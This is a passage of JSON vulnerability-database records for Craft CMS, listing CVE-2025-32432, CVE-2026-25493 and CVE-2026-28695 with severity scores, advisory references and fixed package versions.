addresses.\n\n---","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25493","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05057","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25493"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/0974055634af68998f67850ab2045d8aaa19fa98","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/commit/0974055634af68998f67850ab2045d8aaa19fa98"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25493","reference_id":"CVE-2026-25493","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25493"},{"reference_url":"https://github.com/advisories/GHSA-8jr8-7hr4-vhfx","reference_id":"GHSA-8jr8-7hr4-vhfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8jr8-7hr4-vhfx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-8jr8-7hr4-vhfx","reference_id":"GHSA-8jr8-7hr4-vhfx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:50Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-8jr8-7hr4-vhfx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73947?format=json","purl":"pkg:composer/craftcms/cms@4.16.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.18"},{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25493","GHSA-8jr8-7hr4-vhfx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ppet-ruae-1kav"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57189?format=json","vulnerability_id":"VCID-qq68-3j4y-47am","summary":"Craft CMS Allows Remote Code Execution\nThis is an additional fix for https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g\n\nThis is a high-impact, low-complexity attack vector. To mitigate the issue, users running Craft installations before the fixed versions are encouraged to update to at least that version.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"0.93094","scoring_system":"epss","scoring_elements":"0.99798","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32432"},{"reference_url":"https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/craft-cms-cve-2025-32432"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/3.x/CHANGELOG.md#3915---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/4.x/CHANGELOG.md#41415---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5617---2025-04-10-critical"},{"reference_url":"https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/commit/e1c85441fa47eeb7c688c2053f25419bc0547b47"},{"reference_url":"https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sensepost.com/blog/2025/investigating-an-in-the-wild-campaign-using-rce-in-craftcms"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32432","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-32432"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52525.py","reference_id":"CVE-2025-32432","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52525.py"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32432","reference_id":"CVE-2025-32432","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32432"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g","reference_id":"GHSA-4w8r-3xrw-v25g","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g"},{"reference_url":"https://github.com/advisories/GHSA-f3gw-9ww9-jmc3","reference_id":"GHSA-f3gw-9ww9-jmc3","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f3gw-9ww9-jmc3"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3","reference_id":"GHSA-f3gw-9ww9-jmc3","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Act","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:T/P:M/B:A/M:M/D:C/2026-03-20T15:24:23Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3gw-9ww9-jmc3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/84934?format=json","purl":"pkg:composer/craftcms/cms@4.14.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.14.15"},{"url":"http://public2.vulnerablecode.io/api/packages/84935?format=json","purl":"pkg:composer/craftcms/cms@5.6.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.6.17"}],"aliases":["CVE-2025-32432","GHSA-f3gw-9ww9-jmc3"],"risk_score":10.0,"exploitability":"2.0","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qq68-3j4y-47am"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50587?format=json","vulnerability_id":"VCID-qwmy-d2e8-5khw","summary":"Craft CMS Vulnerable to Authenticated RCE via Twig SSTI - create() function + Symfony Process gadget\nThere is an authenticated admin RCE in Craft CMS 5.8.21 via Server-Side Template Injection using the `create()` Twig function combined with a Symfony Process gadget chain.\n\nThis bypasses the fix implemented for CVE-2025-57811 (patched in 5.8.7).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28695","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08235","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28695"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e31e50849ad71638e11ea55fbd1ed90ae8f8f6e0","reference_id":"","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:03:23Z/"}],"url":"https://github.com/craftcms/cms/commit/e31e50849ad71638e11ea55fbd1ed90ae8f8f6e0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28695","reference_id":"CVE-2026-28695","reference_type":"","scores":[{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28695"},{"reference_url":"https://github.com/advisories/GHSA-94rc-cqvm-m4pw","reference_id":"GHSA-94rc-cqvm-m4pw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-94rc-cqvm-m4pw"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-94rc-cqvm-m4pw","reference_id":"GHSA-94rc-cqvm-m4pw","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-04T17:03:23Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-94rc-cqvm-m4pw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73953?format=json","purl":"pkg:composer/craftcms/cms@4.17.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.0-beta.1"},{"url":"http://public2.vulnerablecode.io/api/packages/73952?format=json","purl":"pkg:composer/craftcms/cms@5.9.0-beta.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@